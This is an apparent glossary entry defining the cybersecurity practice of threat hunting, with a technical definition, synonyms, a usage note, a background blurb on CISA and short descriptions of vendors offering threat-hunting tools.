// THREAT DETECTION AND DATA PRIVACY TERM
Threat Hunting
Threat hunting is a proactive cybersecurity practice where defenders actively search through networks and systems to detect and isolate advanced threats that have bypassed automated security solutions. Unlike traditional security measures that react to alerts, threat hunting assumes a breach has occurred or is in progress, seeking out hidden malicious activity.
TECHNICAL DEFINITION
Threat hunting is a proactive, investigative cybersecurity methodology employed by security analysts to manually or semi-automatically search across enterprise networks, endpoints, and cloud environments for evidence of undetected or stealthy cyber threats, including advanced persistent threats (APTs) and zero-day exploits, leveraging contextual intelligence, behavioral analysis, and anomaly detection to identify malicious indicators that bypassed automated security tools.
BACKGROUND
The Cybersecurity and Infrastructure Security Agency (CISA), headquartered in Arlington, Virginia, is a component of the United States Department of Homeland Security (DHS) responsible for cybersecurity and infrastructure protection across all levels of government, coordinating cybersecurity programs with U.S. states, and improving the government's cybersecurity protections against private and nation-state hackers.
READ MORE ON WIKIPEDIASYNONYMS & ALIASES
- Proactive defense
- Cyber hunting
- Security hunting
- Intrusion hunting
- Adversary pursuit
- Cyber threat hunting
USAGE NOTE
Threat hunting is crucial for detecting sophisticated, fileless, or 'living off the land' attacks that evade signature-based defenses and traditional SIEM alerts, often requiring specialized skills and threat intelligence.
DEVELOPERS
Organizations developing technology related to Threat Hunting.
A leader in incident response and threat intelligence, Mandiant offers advanced threat hunting services and technology platforms designed to proactively identify and neutralize sophisticated cyber threats.
Known for its Falcon platform, CrowdStrike provides endpoint detection and response (EDR) and extended detection and response (XDR) solutions with robust threat hunting capabilities, leveraging AI and threat intelligence.
Through Microsoft Defender XDR, the company integrates sophisticated threat hunting tools, AI-driven insights, and automation to help security teams proactively search for threats across their entire digital estate.
Their Cortex XDR platform is an extended detection and response solution that provides comprehensive threat hunting capabilities, correlating data from various sources to uncover stealthy attacks.
Offers an AI-powered XDR platform designed for autonomous threat detection and assisted threat hunting, providing visibility and automated response capabilities across endpoints, cloud, and identity.
Splunk Enterprise Security (ES) is a leading SIEM platform widely used for aggregating and analyzing security data, providing the foundational insights and tools necessary for effective proactive threat hunting.
Provides an AI-driven XDR platform that focuses on correlation and behavioral analytics to enable efficient threat hunting, helping security analysts detect and respond to complex attacks.
Offers open-source and commercial security solutions, including SIEM and endpoint protection, that enable data-driven threat hunting by providing powerful search, analytics, and visualization capabilities over security data.
MITRE develops critical frameworks like MITRE ATT&CK, which serves as a globally accessible knowledge base of adversary tactics and techniques based on real-world observations, providing a foundational 'technology' and methodology for threat hunting.